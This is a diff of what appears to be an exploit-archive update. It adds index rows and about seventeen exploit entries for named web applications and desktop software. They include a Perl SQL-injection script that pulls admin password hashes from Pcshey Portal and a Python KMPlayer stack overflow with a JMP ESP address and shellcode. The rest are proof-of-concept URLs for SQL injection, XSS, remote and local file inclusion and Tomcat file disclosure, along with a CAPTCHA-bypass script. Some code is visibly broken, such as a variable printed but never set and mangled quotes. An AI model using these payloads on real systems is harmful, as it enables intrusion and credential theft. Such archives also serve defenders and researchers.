Updated 03_11_2014

files.csv

@@ -28911,4 +28911,23 @@ id,file,description,date,author,platform,type,port
 32129,platforms/windows/remote/32129.cpp,"BlazeVideo HDTV Player 3.5 PLF File Stack Buffer Overflow Vulnerability",2008-07-30,"fl0 fl0w",windows,remote,0
 32130,platforms/php/webapps/32130.txt,"DEV Web Management System 1.5 Multiple Input Validation Vulnerabilities",2008-07-30,Dr.Crash,php,webapps,0
 32131,platforms/php/webapps/32131.txt,"ClipSharePro <= 4.1 - Local File Inclusion",2014-03-09,"Saadi Siddiqui",php,webapps,0
-32132,platforms/windows/local/32132.py,"GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution",2014-03-09,"Julien Ahrens",windows,local,0
+32132,platforms/windows/remote/32132.py,"GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution",2014-03-09,"Julien Ahrens",windows,remote,0
+32134,platforms/php/webapps/32134.txt,"H0tturk Panel 'gizli.php' Remote File Include Vulnerability",2008-07-31,U238,php,webapps,0
+32135,platforms/php/webapps/32135.txt,"common solutions csphonebook 1.02 'index.php' Cross Site Scripting Vulnerability",2008-07-31,"Ghost Hacker",php,webapps,0
+32136,platforms/osx/dos/32136.html,"Apple Mac OS X 10.x CoreGraphics Multiple Memory Corruption Vulnerabilities",2008-07-31,"Michal Zalewski",osx,dos,0
+32137,platforms/multiple/remote/32137.txt,"Apache Tomcat <= 6.0.16 'RequestDispatcher' Information Disclosure Vulnerability",2008-08-01,"Stefano Di Paola",multiple,remote,0
+32138,platforms/multiple/remote/32138.txt,"Apache Tomcat <= 6.0.16 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability",2008-08-01,"Konstantin Kolinko",multiple,remote,0
+32139,platforms/php/webapps/32139.txt,"freeForum 1.7 'acuparam' Parameter Cross-Site Scripting Vulnerability",2008-08-01,ahmadbady,php,webapps,0
+32140,platforms/php/webapps/32140.txt,"PHP-Nuke Book Catalog Module 1.0 'catid' Parameter SQL Injection Vulnerability",2008-08-01,"H4ckCity Security Team",php,webapps,0
+32141,platforms/php/webapps/32141.txt,"Homes 4 Sale 'results.php' Cross Site Scripting Vulnerability",2008-08-04,"Ghost Hacker",php,webapps,0
+32142,platforms/php/webapps/32142.php,"Pligg 9.9.5 'CAPTCHA' Registration Automation Security Bypass Weakness",2008-08-02,"Micheal Brooks",php,webapps,0
+32143,platforms/php/webapps/32143.txt,"Keld PHP-MySQL News Script 0.7.1 'login.php' SQL Injection Vulnerability",2008-08-04,crimsoN_Loyd9,php,webapps,0
+32144,platforms/php/webapps/32144.txt,"Meeting Room Booking System (MRBS) 1.2.6 day.php area Parameter XSS",2008-08-04,sl4xUz,php,webapps,0
+32145,platforms/php/webapps/32145.txt,"Meeting Room Booking System (MRBS) 1.2.6 week.php area Parameter XSS",2008-08-04,sl4xUz,php,webapps,0
+32146,platforms/php/webapps/32146.txt,"Meeting Room Booking System (MRBS) 1.2.6 month.php area Parameter XSS",2008-08-04,sl4xUz,php,webapps,0
+32147,platforms/php/webapps/32147.txt,"Meeting Room Booking System (MRBS) 1.2.6 search.php area Parameter XSS",2008-08-04,sl4xUz,php,webapps,0
+32148,platforms/php/webapps/32148.txt,"Meeting Room Booking System (MRBS) 1.2.6 report.php area Parameter XSS",2008-08-04,sl4xUz,php,webapps,0
+32149,platforms/php/webapps/32149.txt,"Meeting Room Booking System (MRBS) 1.2.6 help.php area Parameter XSS",2008-08-04,sl4xUz,php,webapps,0
+32150,platforms/php/webapps/32150.txt,"UNAK-CMS 1.5 'connector.php' Local File Include Vulnerability",2008-08-04,"Sina Yazdanmehr",php,webapps,0
+32151,platforms/asp/webapps/32151.pl,"Pcshey Portal 'kategori.asp' SQL Injection Vulnerability",2008-08-04,U238,asp,webapps,0
+32152,platforms/windows/local/32152.py,"KMPlayer 3.8.0.117 - Buffer Overflow",2014-03-10,metacom,windows,local,0

platforms/asp/webapps/32151.pl

@@ -0,0 +1,48 @@
+source: http://www.securityfocus.com/bid/30534/info
+
+Pcshey Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+#!/usr/bin/perl
+#Coded By U238
+#Discovered By U238
+#mail : setuid.noexec0x1]at]hotmail.com
+#From : Türkiye / Erzincan
+#Thnx : The_BekiR - ZeberuS - Fahn - ka0x - Deep Power - Marco Almeida
+#Gretz: http://bilisimMimarileri.com
+     : http://bilgiguvenligi.gov.tr
+    Mesut Timur & Alper Canak
+
+use LWP::Simple;
+my $bekir= $ARGV[0];
+
+if(!$ARGV[0]) {
+
+print "\nExploit Options\n";
+print "\nUse:perl victim.pl [domain]\n";
+exit(0);
+}
+sleep(2);
+
+print "\n\nPlease Loading…!$bekir\n\n";
+
+$nrc=q[forum/kategori.asp?kid=26+union+select+0,1,2,parola,4,kullanici,6,7+f
+rom+uyeler+where+id=1];
+# where+id=2,3
+$zeb=get($ARGV[0].$nrc) or die print "dont worked";
+
+print "Exploit Succesful";
+
+print "Connecting..: $ARGV[0]n";
+sleep(3);
+
+$zeb=~m/<font face="Tahoma"><strong></strong></font></td>/&& print "admin
+hash: $baba";
+
+
+print "dont username !" if(!$baba);
+
+$zeb=~m/<font face="Tahoma"><strong></strong></font></td>/&& print "pass
+!!: $baba";
+print "dont pass" if(!$baba);

platforms/multiple/remote/32137.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/30494/info
+
+Apache Tomcat is prone to a remote information-disclosure vulnerability.
+
+Remote attackers can exploit this issue to obtain the contents of sensitive files stored on the server. Information obtained may lead to further attacks.
+
+The following versions are affected:
+
+Tomcat 4.1.0 through 4.1.37
+Tomcat 5.5.0 through 5.5.26
+Tomcat 6.0.0 through 6.0.16
+
+Tomcat 3.x, 4.0.x, and 5.0.x may also be affected.
+
+http://www.example.com/page.jsp?blah=/../WEB-INF/web.xml 

platforms/multiple/remote/32138.txt

@@ -0,0 +1,23 @@
+source: http://www.securityfocus.com/bid/30496/info
+
+Apache Tomcat is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+The issue affects the following versions:
+
+Tomcat 4.1.0 through 4.1.37
+Tomcat 5.5.0 through 5.5.26
+Tomcat 6.0.0 through 6.0.16 
+
+<%@page contentType="text/html"%>
+<%
+~  // some unicode characters, that result in CRLF being printed
+~  final String CRLF = "\u010D\u010A";
+
+~  final String payload = CRLF + CRLF + "<script
+type='text/javascript'>document.write('Hi, there!')</script><div
+style='display:none'>";
+~  final String message = "Authorization is required to access " + payload;
+~  response.sendError(403, message);
+%>

platforms/php/webapps/32134.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/30468/info
+
+H0tturk Panel is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible. 
+
+http://www.example.com/hot/gizli.php?cfgProgDir=cmd.txt? 

platforms/php/webapps/32135.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/30485/info
+
+The 'csphonebook' program (from common solutions) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects csphonebook 1.02; other versions may also be affected. 
+
+
+http://www.example.com/index.php?letter=[XSS] 

platforms/php/webapps/32139.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30509/info
+
+freeForum is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+freeForum 1.7 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/?acuparam=>"><ScRiPt>alert(111)</ScRiPt> http://www.example.com/path/index.php/>'><ScRiPt>alert(111)</ScRiPt> http://www.example.com/path/index.php?acuparam=>"><ScRiPt>alert(111)</ScRiPt> 

platforms/php/webapps/32140.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/30511/info
+
+
+The Book Catalog module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/modules.php?name=BookCatalog&op=category&catid=1+-9+union+select+1,pwd+from+nuke_authors
+http://www.example.com/modules.php?name=BookCatalog&op=category&catid=1+-9+union+select+1,aid+from+nuke_authors
+

platforms/php/webapps/32141.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/30517/info
+
+Homes 4 Sale is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/result.php?r=c%253E%255BHWtZYeidnW%257BdH%253A1MnOwcR%253E%253E%2527tfbsdi%2560uzqf%253Etfbsdi%2527f%253Ebtl%253CTB%253C67%253C2% 253C2%253C498984%253Ctuzmf2%256067%252Fdtt%253C3%253Cjoufsdptnpt%2560bggjmjbuf%25602%2560e3s%2560efsq%253Cksfct31%253Cksfct31%253C93454%253C43642%253Cbtl %253C%253C0e0tfbsdi0q0joufsdptnpt0ynm0epnbjomboefs0joum0e3s0gfg0qpqdbu0w30%253Cqbslfe%252Ftzoejdbujpo%252Fbtl%252Fdpn%2527jqvb%2560je%253E%253A%253A597&K eywords= 

platforms/php/webapps/32142.php

@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/30518/info
+
+Pligg is prone to a security-bypass weakness.
+
+Successfully exploiting this issue will allow an attacker to register multiple new users through an automated process. This may lead to other attacks.
+
+Pligg 9.9.5 is vulnerable; other versions may also be affected.
+
+<?php
+
+$sitekey=82397834;
+
+$ts_random=$_REQUEST[&#039;ts_random&#039;];
+
+$datekey = date(?F j?);
+
+$rcode = hexdec(md5($_SERVER[&#039;HTTP_USER_AGENT&#039;] . $sitekey . $ts_random . $datekey));
+
+print substr($rcode, 2, 6);
+
+?>

platforms/php/webapps/32143.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/30529/info
+
+Keld PHP-MySQL News Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Keld PHP-MySQL News Script 0.7.1 is vulnerable; other versions may also be affected. 
+
+The following proofs of concept are available:
+
+A. admin' OR 1=1/*
+B. fdfds' OR 1=1 limit x/*
+C.' AND 1=2 union select 1,2/* 

platforms/php/webapps/32144.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30531/info
+
+MRBS (Meeting Room Booking Software) is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+MRBS 1.2.6 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/path/day.php?area=[XSS]

platforms/php/webapps/32145.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30531/info
+ 
+MRBS (Meeting Room Booking Software) is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+MRBS 1.2.6 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/path/week.php?area=[XSS]

platforms/php/webapps/32146.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30531/info
+  
+MRBS (Meeting Room Booking Software) is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+  
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+  
+MRBS 1.2.6 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/path/month.php?area=[XSS]

platforms/php/webapps/32147.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30531/info
+   
+MRBS (Meeting Room Booking Software) is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+   
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+   
+MRBS 1.2.6 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/path/search.php?area=[XSS]

platforms/php/webapps/32148.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30531/info
+    
+MRBS (Meeting Room Booking Software) is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+    
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+    
+MRBS 1.2.6 is vulnerable; other versions may also be affected.
+ 
+http://www.example.com/path/report.php?area=[XSS]

platforms/php/webapps/32149.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30531/info
+     
+MRBS (Meeting Room Booking Software) is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+     
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+     
+MRBS 1.2.6 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/help.php?area=[XSS] 

platforms/php/webapps/32150.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30533/info
+
+UNAK-CMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks.
+
+UNAK-CMS 1.5.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Dirroot=/file.type%00 

platforms/windows/local/32152.py

@@ -0,0 +1,32 @@
+#!/usr/bin/python
+# KMPlayer 3.8.0.117 Buffer Overflow
+# Author: metacom
+# Tested on: Windows Xp pro-sp3 En
+# Download link :http://www.chip.de/downloads/KMPlayer_33859258.html
+# Version: 3.8.0.117 Kmp Plus
+# Howto / Notes:
+# Run KMPlayer Playlist Editor > New Album and paste Exploit Code
+import struct
+def little_endian(address):
+  return struct.pack("<L",address)
+  
+
+junk = "\x41" * 250
+eip = little_endian(0x7C86467B)   #7C86467B   FFE4  JMP ESP  kernel32.dll        
+
+shellcode=(
+        "\x31\xC9"                #// xor ecx,ecx        
+        "\x51"                    #// push ecx        
+        "\x68\x63\x61\x6C\x63"    #// push 0x636c6163        
+        "\x54"                    #// push dword ptr esp        
+        "\xB8\xC7\x93\xC2\x77"    #// mov eax,0x77c293c7        
+        "\xFF\xD0"                #// call eax  
+		)
+
+exploit = junk + eip + shellcode
+try:
+    rst= open("crash.txt",'w')
+    rst.write(exploit)
+    rst.close()
+except:
+    print "Error"